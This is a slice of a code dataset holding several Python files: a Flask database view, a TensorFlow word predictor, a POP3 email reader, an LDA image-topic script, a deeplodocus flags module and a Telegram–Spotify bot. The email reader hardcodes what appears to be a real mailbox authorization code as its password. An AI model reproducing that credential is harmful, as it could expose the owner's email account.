"line_number": 524, "usage_type": "attribute"}]} +{"seq_id": "557880080", "text": "from flask import Blueprint, render_template, url_for\nfrom flask import current_app as app\nfrom app.database import CursorFromConnectionPool\n\n#### ROBIDEX\nfrom sqlalchemy.sql import text, select\nfrom app.extensions import db\n\n### trying with straight psycopg2\n\n# 2.0 takes in arguments: variable=Blueprint('BlueprintName', __name__, etc....)\nbpill = Blueprint('bluepill', __name__, template_folder='templates', static_folder='static')\n\n@bpill.route('/')\ndef bluepillhome():\n return render_template('bluepill/index.html')\n\n@bpill.route('/test')\ndef test():\n \"\"\" blah blah\"\"\"\n return render_template('bluepill/index.html')\n\n@bpill.route('/database')\ndef db_test():\n list_status = ['Manhattan','Brooklyn','Queens','Bronx','Staten Island']\n default='Manhattan'\n with CursorFromConnectionPool() as cursor:\n cursor.execute(\"SELECT * FROM man_matview WHERE boro='1' AND block::numeric<=20\")\n fetched = cursor.fetchall()\n # if list_status = 'Manhattan':\n # cursor.execute(\"SELECT * FROM man_matview WHERE boro='1' AND block::numeric<=20\")\n # fetched = cursor.fetchall()\n # if list_status='Brooklyn':\n # cursor.execute(\"SELECT * FROM bk_matview WHERE boro='2' AND block::numeric<=20\")\n # fetched = cursor.fetchall()\n # return cls(boro=fetched[0], block=fetched[1], lot=fetched[2], buil_num=fetched[5], street_name=fetched[6])\n # return (boro=fetched[0], block=fetched[1])\n return render_template('bluepill/db_tests.html', list_status=list_status, default=default, fetched=fetched)\n # return render_template('bluepill/db_test.html', fetched=fetched, boro=boro)\n\n\n\"\"\" sqlalchemy.exc.ProgrammingError: (psycopg2.errors.UndefinedTable) relation \"man_matview\" does not exist\nLINE 1: SELECT * FROM man_matview WHERE boro='1' AND block='10' \nCreate Engine from scratch and pull data without \"\"\"\n# @bpill.route('/database')\n# def db_test():\n# sqltest = text(\n# \"SELECT * FROM man_matview WHERE boro='1' AND block='10'\"\n# )\n# db.session.execute(sqltest)\n# return render_template('bluepill.db_test.html',testdata=testdata, boro=boro, block=block, lot=lot, str_name=str_name)\n\n\n\n\n# @bpill.route('/database')\n# def db_test():\n# # sqltest = text(\n# # \"SELECT * FROM man_matview WHERE boro='1' AND block='10'\"\n# # )\n# with CursorFromConnectionPool as cursor:\n# cursor.execute(\"SELECT * FROM man_matview WHERE boro='1' AND block='10'\")\n# test_data=cursor.fetchall()\n# return cls(boro=test_data[1], block=test_data[2], lot=test_data[3], str_name=test_data[6])\n# return render_template('bluepill.db_test.html',testdata=testdata, boro=boro, block=block, lot=lot, str_name=str_name)\n\n# @app.route(\"/markup\")\n# def markup():\n# return Markup(\"

    Returned h1 Markup

    \")\n\n# # Need to work on JSON response. Check out \"Routing w/ Flask\"\n# @app.route(\"/makeresponse\", methods=['GET'])\n# def makeit():\n# if request.method != 'GET':\n# return make_response('Malformed request', 400)\n# my_dict = {'key': 'dictionary value'}\n# headers = {\"Content-Type\": \"application/json\"}\n# return make_response(jsonify(my_dict), 200, headers=headers)", "sub_path": "myapp/app/blueprints/bluepill/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3212, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.Blueprint", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "app.database.CursorFromConnectionPool", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "336989036", "text": "import os\nimport time\nimport gensim\nimport pymorphy2\nimport numpy as np\nimport tensorflow as tf\nfrom keras_preprocessing.text import Tokenizer\nimport argparse\n\nparser = argparse.ArgumentParser(description='Generating sentences v0.01')\nparser.add_argument('word', metavar='word_to_predict', type=str, nargs='+',\n help='an integer for the accumulator')\nargs = parser.parse_args()\npredict_word = \"мишка\"\nprint(\"ARGS: %s\" %(args))\nif args.word:\n predict_word = args.word[0]\n\ntf.enable_eager_execution()\nfile_path = \"/home/neuron/dataset/small_linux.txt\"\nfile_path = \"G:\\\\New folder\\\\month-2011-12-qtraf_small\"\n\nload_word2vec_path = \"/home/neuron/dataset/model.bin\"\nload_word2vec_path = \"G:\\\\New folder\\\\ruwikiruscorpora_tokens_elmo_1024_2019\\\\ruwikiruscorpora_upos_skipgram_300_2_2019\\\\model.bin\"\n\n#Now we load \nmodel = gensim.models.KeyedVectors.load_word2vec_format(load_word2vec_path, binary=True)\nmodel.init_sims(replace=True)\nmorph = pymorphy2.MorphAnalyzer()\ncotags = {\n 'ADJF':'ADJ', # pymorphy2: word2vec \n 'ADJS' : 'ADJ', \n 'ADVB' : 'ADV', \n 'COMP' : 'ADV', \n 'GRND' : 'VERB', \n 'INFN' : 'VERB', \n 'NOUN' : 'NOUN', \n 'PRED' : 'ADV', \n 'PRTF' : 'ADJ', \n 'PRTS' : 'VERB', \n 'VERB' : 'VERB'\n}\n\ntext = open(file_path).read()\n \ntokenizer = Tokenizer()\ntokenizer.fit_on_texts([text])\n \nencoded = tokenizer.texts_to_sequences([text])[0]\n \nvocab_size = len(tokenizer.word_index) + 1\n \nword2idx = tokenizer.word_index\nidx2word = tokenizer.index_word\n\nsequences = list()\n\nfor i in range(1, len(encoded)):\n sequence = encoded[i - 1:i + 1]\n sequences.append(sequence)\nsequences = np.array(sequences)\n#print(word2idx)\nX, Y = sequences[:, 0], sequences[:, 1]\nX = np.expand_dims(X, 1)\nY = np.expand_dims(Y, 1)\n\nBUFFER_SIZE = 100\nBATCH_SIZE = 100\ndataset = tf.data.Dataset.from_tensor_slices((X, Y)).shuffle(BUFFER_SIZE)\ndataset = dataset.batch(BATCH_SIZE, drop_remainder=True)\n\nclass Model(tf.keras.Model):\n def __init__(self, vocab_size, embedding_dim, units, batch_size):\n super(Model, self).__init__()\n self.units = units\n self.batch_size = batch_size\n \n self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)\n \n self.gru = tf.keras.layers.GRU(self.units,\n return_sequences=True,\n return_state=True,\n recurrent_activation='sigmoid',\n recurrent_initializer='glorot_uniform')\n self.fc = tf.keras.layers.Dense(vocab_size)\n \n def call(self, inputs, hidden):\n inputs = self.embedding(inputs)\n #print(inputs)\n output, states = self.gru(inputs, initial_state=hidden)\n \n output = tf.reshape(output, (-1, output.shape[2]))\n \n x = self.fc(output)\n \n return x, states\n \n#This function returns only similar words that contains in train dataset\ndef sortSimilarListByDataset(words_list):\n ret_list = []\n for word in words_list:\n try:\n if word2idx[word]:\n ret_list.append(word)\n except KeyError:\n continue\n return ret_list\n#Returns Top N words, that similars with\ndef getSimilarsForWord(word, top=10):\n parsed = morph.parse(word)\n try:\n pos = cotags[parsed[0].tag.POS]\n except KeyError:\n return [word]\n gensim_find_word = word + \"_\" + pos\n most_similars = model.most_similar([gensim_find_word], topn=top)\n return_list = []\n for sim in most_similars:\n sim_parsed = sim[0].split(\"_\")\n if sim_parsed[1] == pos:\n return_list.append(sim_parsed[0])\n return return_list\n\n \nembedding_dim = 100\n \nunits = 2048\n \nkeras_model = Model(vocab_size, embedding_dim, units, BATCH_SIZE)\n\noptimizer = tf.train.AdamOptimizer()\n \n#checkpoint_dir = '.\\\\training_checkpoints_wordstat'\ncheckpoint_dir = '.\\\\training_checkpoints_wordstat_small2048'\n\ncheckpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\ncheckpoint = tf.train.Checkpoint(optimizer=optimizer, model=keras_model)\n\ndef loss_function(labels, logits):\n return tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\nEPOCHS = 10\n# for epoch in range(EPOCHS):\n# start = time.time()\n \n# hidden = keras_model.reset_states()\n \n# for (batch, (input, target)) in enumerate(dataset):\n# with tf.GradientTape() as tape:\n# predictions, hidden = keras_model(input, hidden)\n \n# target = tf.reshape(target, (-1,))\n# loss = loss_function(target, predictions)\n \n# grads = tape.gradient(loss, keras_model.variables)\n# optimizer.apply_gradients(zip(grads, keras_model.variables))\n \n# if batch % 100 == 0:\n# print('Epoch {} Batch {} Loss {:.4f}'.format(epoch + 1, batch, loss))\n \n# if (epoch + 1) % 10 == 0:\n# checkpoint.save(file_prefix=checkpoint_prefix)\n\ncheckpoint.restore(tf.train.latest_checkpoint(checkpoint_dir))\n#print(\"UNITS: %s\" %(units))\nhidden = [tf.zeros((1, units))]\n\n#Now we find similars for start word\nsimilar_words = getSimilarsForWord(predict_word, 10)\nsimilar_words.append(predict_word)\ndataset_words_list = sortSimilarListByDataset(similar_words)\n#print(\"dataset_words_list %s\" %(dataset_words_list))\n\nsequences_lists = [[word] for word in dataset_words_list]\n# sequences_list = [[word] for word in dataset_words_list]\n# sequences_lists = []\n# for i in range(5):\n# for elem in sequences_list:\n# sequences_lists.append(elem)\n\n#print(sequences_lists)\nfor sequence in sequences_lists:\n for i in range(1):\n input_eval = [word2idx[sequence[i]]]\n input_eval = tf.expand_dims(input_eval, 0) \n\n predictions, hidden = keras_model(input_eval, hidden)\n# print(\"PREDICTIONS\")\n# print(predictions)\n\n predicted_id = tf.argmax(predictions[-1]).numpy()\n\n sequence.append(idx2word[predicted_id])\n \nfor sequence in sequences_lists:\n print(\" \".join(sequence))", "sub_path": "from_scratch/word_prediction_run.py", "file_name": "word_prediction_run.py", "file_ext": "py", "file_size_in_byte": 6022, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.enable_eager_execution", "line_number": 19, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 27, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pymorphy2.MorphAnalyzer", "line_number": 29, "usage_type": "call"}, {"api_name": "keras_preprocessing.text.Tokenizer", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.GRU", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Checkpoint", "line_number": 137, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 137, "usage_type": "attribute"}, {"api_name": "tensorflow.losses.sparse_softmax_cross_entropy", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.losses", "line_number": 140, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 164, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 164, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 166, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 185, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 191, "usage_type": "call"}]} +{"seq_id": "220761520", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom email.parser import Parser\nfrom email.header import decode_header\nfrom email.utils import parseaddr\n\nimport poplib\n\n# import email\n# 错误写法from email.message_from_string import message_from_string\nfrom email import message_from_string\n \n\n# 输入邮件地址, 口令和POP3服务器地址:\nemail = input('Email: ')\n# password = input('Password: ')\n# pop3_server = input('POP3 server: ')\npassword = 'mndbotrtnlqmdddh'\npop3_server = 'pop.qq.com'\n\ndef guess_charset(msg):\n charset = msg.get_charset()\n if charset is None:\n content_type = msg.get('Content-Type', '').lower()\n pos = content_type.find('charset=')\n if pos >= 0:\n charset = content_type[pos + 8:].strip()\n return charset\n\n#邮件的Subject或者Email中包含的名字都是经过编码后的str,要正常显示,就必须decode:\ndef decode_str(s):\n value, charset = decode_header(s)[0]\n if charset:\n value = value.decode(charset)\n return value\n\ndef print_info(msg, indent=0):\n if indent == 0:\n for header in ['From', 'To', 'Subject']:\n value = msg.get(header, '')\n if value:\n if header=='Subject':\n value = decode_str(value)\n else:\n hdr, addr = parseaddr(value)\n name = decode_str(hdr)\n value = u'%s <%s>' % (name, addr)\n print('%s%s: %s' % (' ' * indent, header, value))\n if (msg.is_multipart()):\n parts = msg.get_payload()\n for n, part in enumerate(parts):\n print('%spart %s' % (' ' * indent, n))\n print('%s--------------------' % (' ' * indent))\n print_info(part, indent + 1)\n else:\n content_type = msg.get_content_type()\n if content_type=='text/plain' or content_type=='text/html':\n content = msg.get_payload(decode=True)\n charset = guess_charset(msg)\n if charset:\n content = content.decode(charset)\n print('%sText: %s' % (' ' * indent, content + '...'))\n else:\n print('%sAttachment: %s' % (' ' * indent, content_type))\n\n# 连接到POP3服务器:\n# server = poplib.POP3(pop3_server)\n# Error: b'-ERR Login fail. A secure connection is requiered(such as ssl). More information at http://service.mail.qq.com/cgi-bin/help?id=28'\nserver = poplib.POP3_SSL(pop3_server)\n# 可以打开或关闭调试信息:\nserver.set_debuglevel(1)\n# 可选:打印POP3服务器的欢迎文字:\nprint(server.getwelcome().decode('utf-8'))\n\ndef server_stat(server):\n # stat()返回邮件数量和占用空间:\n print('Messages: %s. Size: %s' % server.stat())\n # list()返回所有邮件的编号:\n resp, mails, octets = server.list()\n # 可以查看返回的列表类似[b'1 82923', b'2 2184', ...]\n print('mails>>',mails)\n\n # 获取最新一封邮件, 注意索引号从1开始:\n index = len(mails)#新邮件????????\n print('index>>',index)\n resp, lines, octets = server.retr(index)\n # lines存储了邮件的原始文本的每一行,\n # 可以获得整个邮件的原始文本:\n msg_content = b'\\r\\n'.join(lines).decode('utf-8')\n\n # 稍后解析出邮件:\n #!!!!Message对象本身可能是一个MIMEMultipart对象,即包含嵌套的其他MIMEBase对象,嵌套可能还不止一层\n msg = Parser().parsestr(msg_content)\n print_info(msg)\n\n # 可以根据邮件索引号直接从服务器删除邮件:\n # server.dele(index)\n\ndef email_message(server):\n # stat()返回邮件数量和占用空间:\n allemail = server.stat()\n print('Messages: %s. Size: %s' % allemail)\n\n # 参考https://blog.csdn.net/yatere/article/details/6654647 实际代码\n # 取出信件头部。注意:top指定的行数是以信件头为基数的,也就是说当取0行,\n # 其实是返回头部信息,取1行其实是返回头部信息之外再多1行。\n topemail = server.top(allemail[0], 0)\n emaillist = []\n\n\n # 参考https://blog.csdn.net/guogaoan/article/details/37034473\n # 提取当前收件箱中最新的一封邮件,由于邮件数据是经过编码的,这里我们依次尝试utf8、gbk、big5三种编码格 式进行解码,并提取邮件标题部分数据\n \n\n '''\n type=messageString.get_content_charset()\n #if type=='gb2312':\n # unicode(messageString.get_payload(),'gb2312')\n #if type=='shift_jis':\n # unicode(messageString.get_payload(),'shift_jis')\n #if type=='None':\n # unicode(messageString.get_payload(),'utf-8')\n '''\n for item in topemail[1]:\n try:\n emaillist.append(item.decode('utf8'))\n except Exception as e:\n try:\n emaillist.append(item.decode('gbk'))\n except Exception as e:\n emaillist.append(item.decode('big5'))\n emailmsg = message_from_string('\\n'.join(emaillist))\n emailsub = decode_header(emailmsg['subject'])\n # 其中emailsub通常包括两个信息,一个是编码后的标题文本数据,另一个 是其编码格式,所以我们还需要再进行一次解码,这时获得的才是真正可用的标题文本数据。\n if emailsub[0][1]:\n submsg = emailsub[0][0].decode(emailsub[0][1])\n else:\n submsg = emailsub[0][0]\n return submsg\n\ntry:\n # 身份认证:\n server.user(email)\n server.pass_(password)\nexcept Exception as e:\n print('Error:', e)\n # 幸好打印错误码,不然一脸懵逼\n # 参考https://blog.csdn.net/qq_41104478/article/details/78581400\n print('读取邮件登录失败') \n # exit()\nelse:\n # 如果没有错误发生,可以在except语句块后面加一个else\n # server_stat(server)\n submsg = email_message(server)\n print('submsg>>\\n',submsg)\n\n # 关闭连接:\n server.quit()\n print('server.quit')\nfinally:\n # except执行后,都会执行,\n # 执行完except后,如果有finally语句块,则执行finally语句块\n print('finally...')\n\n\n# def pop_connect(self):\n# try:\n# self.reademail = poplib.POP3_SSL(self._pop_server)\n# self.reademail.user(self._addr)\n# self.reademail.pass_(self._password)\n# self.allemail = self.reademail.stat()\n# except: print('读取邮件登录失败') exit()\n\n# def receive_email(self):\n# self.pop_connect()\n# topemail = self.reademail.top(self.allemail[0], 0)\n# emaillist = []\n# for item in topemail[1]:\n# try:\n# emaillist.append(item.decode('utf8'))\n# except: try:\n# emaillist.append(item.decode('gbk'))\n# except:\n# emaillist.append(item.decode('big5'))\n# emailmsg = email.message_from_string('\\n'.join(emaillist))\n# emailsub = email.header.decode_header(emailmsg['subject'])\n# if emailsub[0][1]:\n# submsg = emailsub[0][0].decode(emailsub[0][1])\n# else:\n# submsg = emailsub[0][0]\n# return submsg\n\n\n\n", "sub_path": "shutdowmemail/recevie_test.py", "file_name": "recevie_test.py", "file_ext": "py", "file_size_in_byte": 7006, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "email.parser", "line_number": 16, "usage_type": "name"}, {"api_name": "email.header.decode_header", "line_number": 33, "usage_type": "call"}, {"api_name": "email.utils.parseaddr", "line_number": 46, "usage_type": "call"}, {"api_name": "poplib.POP3_SSL", "line_number": 70, "usage_type": "call"}, {"api_name": "email.parser.Parser", "line_number": 94, "usage_type": "call"}, {"api_name": "email.message_from_string", "line_number": 133, "usage_type": "call"}, {"api_name": "email.header.decode_header", "line_number": 134, "usage_type": "call"}, {"api_name": "email.parser", "line_number": 144, "usage_type": "argument"}]} +{"seq_id": "266932094", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\n'''####### '''\n\n\n# In[2]:\n\n\nimport numpy as np\nimport pickle\n#import operator\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom gensim import corpora, models\n\n\n# In[3]:\n\n\ndataset = 'imagenet'\npercentileset = 'imagenet'\n\nimage_fc7 = np.load('data/' + dataset + '_fc7.npy') ######### dataset fc7\npercentile_fc7 = np.load('data/' + percentileset + '_percentile_fc7.npy')\n# Load image id list\nimg_list = np.load('data/' + dataset + '_raw_image_list.npy') ######### dataset image list\n\n\n# In[4]:\n\n\nbinary_vector_fc7 = np.greater(image_fc7, percentile_fc7).astype(int) ###########\n\n\n# In[5]:\n\n\nprint(\"Data shape: \", binary_vector_fc7.shape)\nprint(\"Number of 1s: \", np.sum(binary_vector_fc7 == 1))\nprint(\"Number of 0s: \", np.sum(binary_vector_fc7 == 0))\nprint(\"Anomailes: \",np.sum([binary_vector_fc7 < 0]))\n\n\n# In[6]:\n\n\n# Define parameters for topic modelling\nnum_topics = [10, 20, 50]\nnum_words = 4096 # Number of top features to be displayed per topic\nnum_images = binary_vector_fc7.shape[0]\n\n\n# In[7]:\n\n\n# Prepare for corpus\ncorpus_fc7 = [[(j, binary_vector_fc7[i, j]) for j in range(num_words) if binary_vector_fc7[i, j]==1] for i in range(num_images)]\ncorpora.MmCorpus.serialize('data/corpus_fc7.mm', corpus_fc7)\n\n# Load corpus\ncorpus = corpora.MmCorpus('data/corpus_fc7.mm')\nprint(corpus[:2])\n\n\n# In[8]:\n\n\nfor K in num_topics:\n # Create the Topic Model\n model_name = str(K) + '-topics.model'\n lda = models.ldamodel.LdaModel(corpus, num_topics = K)\n lda.save('data/' + model_name)\n\n # Get topic for each image\n img_by_topic = [[] for _ in range(K)]\n for i in range(num_images):\n ind, val = sorted(lda.get_document_topics(corpus[i]), key=lambda x:x[1])[-1]\n img_by_topic[ind].append((i, val))\n\n for j in range(K):\n img_by_topic[j].sort(key = lambda x: -x[1])\n\n # Save results\n with open(\"data/\" + str(K) + \"-topic-res-fc7.txt\", \"wb\") as fp:\n pickle.dump(img_by_topic, fp)\n\n# # Or load the saved model\n# ldamodel = gensim.models.ldamodel.LdaModel.load(\"../2 topics/\"+model_name)\n\n\n# In[9]:\n\n\nfor K in num_topics:\n with open(\"data/\" + str(K) + \"-topic-res-fc7.txt\", \"rb\") as fp:\n img_by_topic = pickle.load(fp) \n \n top_list = range(K)\n for topic in top_list:\n fig, ax = plt.subplots(nrows=5, ncols=5, dpi=160)\n fig.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=0.3)\n fig.suptitle(str(K)+' Topics: Topic '+str(topic+1))\n i = 0\n try:\n for row in ax:\n for col in row:\n I = img_list[img_by_topic[topic][i][0]]\n i += 1\n col.axis('off')\n col.imshow(I)\n col.set_title(i, fontsize=5)\n col.imshow(I) \n plt.show() \n except:\n print ('No samples in current topic')\n\n", "sub_path": "fc7 - topic 10 20 50.py", "file_name": "fc7 - topic 10 20 50.py", "file_ext": "py", "file_size_in_byte": 2949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.load", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.greater", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 45, "usage_type": "call"}, {"api_name": "gensim.corpora.MmCorpus.serialize", "line_number": 62, "usage_type": "call"}, {"api_name": "gensim.corpora.MmCorpus", "line_number": 62, "usage_type": "attribute"}, {"api_name": "gensim.corpora", "line_number": 62, "usage_type": "name"}, {"api_name": "gensim.corpora.MmCorpus", "line_number": 65, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 65, "usage_type": "name"}, {"api_name": "gensim.models.ldamodel.LdaModel", "line_number": 75, "usage_type": "call"}, {"api_name": "gensim.models.ldamodel", "line_number": 75, "usage_type": "attribute"}, {"api_name": "gensim.models", "line_number": 75, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 89, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "257315931", "text": "import torch\nimport torch.nn.functional\n\nfrom deeplodocus.utils import get_main_path\nimport deeplodocus.data.transforms as tfm\n\n\nDEEP_MODULE_OPTIMIZERS = {\"pytorch\":\n {\"path\" : torch.optim.__path__,\n \"prefix\" : torch.optim.__name__},\n \"custom\":\n {\"path\": [get_main_path() + \"/modules/optimizers\"],\n \"prefix\": \"modules.optimizers\"}\n }\n\nDEEP_MODULE_MODELS = {\"custom\":\n {\"path\": [get_main_path() + \"/modules/models\"],\n \"prefix\": \"modules.models\"}\n }\n\nDEEP_MODULE_LOSSES = {\"pytorch\":\n {\"path\" : torch.nn.__path__,\n \"prefix\" : torch.nn.__name__},\n \"custom\":\n {\"path\": [get_main_path() + \"/modules/losses\"],\n \"prefix\": \"modules.losses\"}\n }\n\nDEEP_MODULE_METRICS = {\"pytorch\":\n {\"path\" : torch.nn.__path__,\n \"prefix\" : torch.nn.__name__},\n \"custom\":\n {\"path\": [get_main_path() + \"/modules/metrics\"],\n \"prefix\": \"modules.metrics\"}\n }\n\nDEEP_MODULE_TRANSFORMS = {\"deeplodocus\":\n {\"path\" : tfm.__path__,\n \"prefix\" : tfm.__name__},\n \"custom\":\n {\"path\": [get_main_path() + \"/modules/transforms\"],\n \"prefix\": \"modules.transforms\"}\n }", "sub_path": "deeplodocus/utils/flags/module.py", "file_name": "module.py", "file_ext": "py", "file_size_in_byte": 1742, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.optim", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 10, "usage_type": "attribute"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 12, "usage_type": "call"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "attribute"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "attribute"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 33, "usage_type": "call"}, {"api_name": "deeplodocus.data.transforms.__path__", "line_number": 38, "usage_type": "attribute"}, {"api_name": "deeplodocus.data.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "deeplodocus.data.transforms.__name__", "line_number": 39, "usage_type": "attribute"}, {"api_name": "deeplodocus.data.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "deeplodocus.utils.get_main_path", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "275856281", "text": "from uuid import uuid4\nfrom pony import orm\nfrom telegram import (\n ParseMode,\n InlineQueryResultArticle,\n InputTextMessageContent,\n InlineKeyboardMarkup,\n InlineKeyboardButton,\n)\nfrom telegram.utils.helpers import escape_markdown\nfrom datetime import datetime\n\nfrom models import User\nfrom spotify_client import spt, get_credentials\nfrom utils import bot_description\n\n\ndef help(update, context):\n \"\"\"Send a message when the command /help is issued.\"\"\"\n update.message.reply_text(bot_description)\n\n\n@orm.db_session\ndef start(update, context):\n \"\"\"Send a message when the command /start is issued.\"\"\"\n if spt.is_oauth_ready:\n user_id = str(update.message.from_user.id)\n url = spt.auth_uri(state=user_id)\n update.message.reply_text(\n \"Tap the button below to log in with your Spotify account\",\n reply_markup=InlineKeyboardMarkup(\n inline_keyboard=[[InlineKeyboardButton(text=\"Login\", url=url)]]\n ),\n )\n else:\n print(\"There's something wrong\")\n update.message.reply_text(\"There's something wrong\")\n\n\n@orm.db_session\ndef inlinequery(update, context):\n \"\"\"Handle the inline query.\"\"\"\n user_id = update.inline_query.from_user.id\n users = orm.select(u for u in User if u.telegram_id == user_id)[:]\n if users:\n user = users[0]\n else:\n update.inline_query.answer(\n [],\n switch_pm_text=\"Login to Spotify\",\n switch_pm_parameter=\"spotify_log_in\",\n cache_time=0,\n )\n return 0\n\n user_creds = get_credentials(user)\n\n spoti = spt\n spoti.user_creds = user_creds\n\n current_status = spoti.currently_playing() # [\"item\"]\n if current_status:\n song = spoti.currently_playing()[\"item\"]\n else: # no songs currently playing\n song = spoti.recently_played_tracks(limit=1)[\"items\"][0][\n \"track\"\n ] # get the last played song\n print(\n \"{} | {} - {}\".format(datetime.now(), song[\"artists\"][0][\"name\"], song[\"name\"])\n )\n song_title = song[\"name\"]\n song_artist = song[\"artists\"][0][\"name\"]\n song_url = song[\"external_urls\"][\"spotify\"]\n thumb = song[\"album\"][\"images\"][-1]\n results = [\n InlineQueryResultArticle(\n id=uuid4(),\n title=\"{} - {}\".format(song_artist, song_title),\n url=song_url,\n thumb_url=thumb[\"url\"],\n thumb_width=thumb[\"width\"],\n thumb_height=thumb[\"height\"],\n input_message_content=InputTextMessageContent(\n \"🎵 [{}]({}) by {}\".format(\n escape_markdown(song_title), song_url, escape_markdown(song_artist)\n ),\n parse_mode=ParseMode.MARKDOWN,\n ),\n reply_markup=InlineKeyboardMarkup(\n inline_keyboard=[\n [InlineKeyboardButton(text=\"Listen on Spotify\", url=song_url)]\n ]\n ),\n )\n ]\n\n update.inline_query.answer(results, cache_time=0)\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n print('Update \"%s\" caused error \"%s\"', update, context.error)\n", "sub_path": "bot_callbacks.py", "file_name": "bot_callbacks.py", "file_ext": "py", "file_size_in_byte": 3182, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "utils.bot_description", "line_number": 20, "usage_type": "argument"}, {"api_name": "spotify_client.spt.is_oauth_ready", "line_number": 26, "usage_type": "attribute"}, {"api_name": "spotify_client.spt", "line_number": 26, "usage_type": "name"}, {"api_name": "spotify_client.spt.auth_uri", "line_number": 28, "usage_type": "call"}, {"api_name": "spotify_client.spt", "line_number": 28, "usage_type": "name"}, {"api_name": "telegram.InlineKeyboardMarkup", "line_number": 31, "usage_type": "call"}, {"api_name": "telegram.InlineKeyboardButton", "line_number": 32, "usage_type": "call"}, {"api_name": "pony.orm.db_session", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pony.orm", "line_number": 23, "usage_type": "name"}, {"api_name": "pony.orm.select", "line_number": 44, "usage_type": "call"}, {"api_name": "pony.orm", "line_number": 44, "usage_type": "name"}, {"api_name": "models.User", "line_number": 44, "usage_type": "name"}, {"api_name": "spotify_client.get_credentials", "line_number": 56, "usage_type": "call"}, {"api_name": "spotify_client.spt", "line_number": 58, 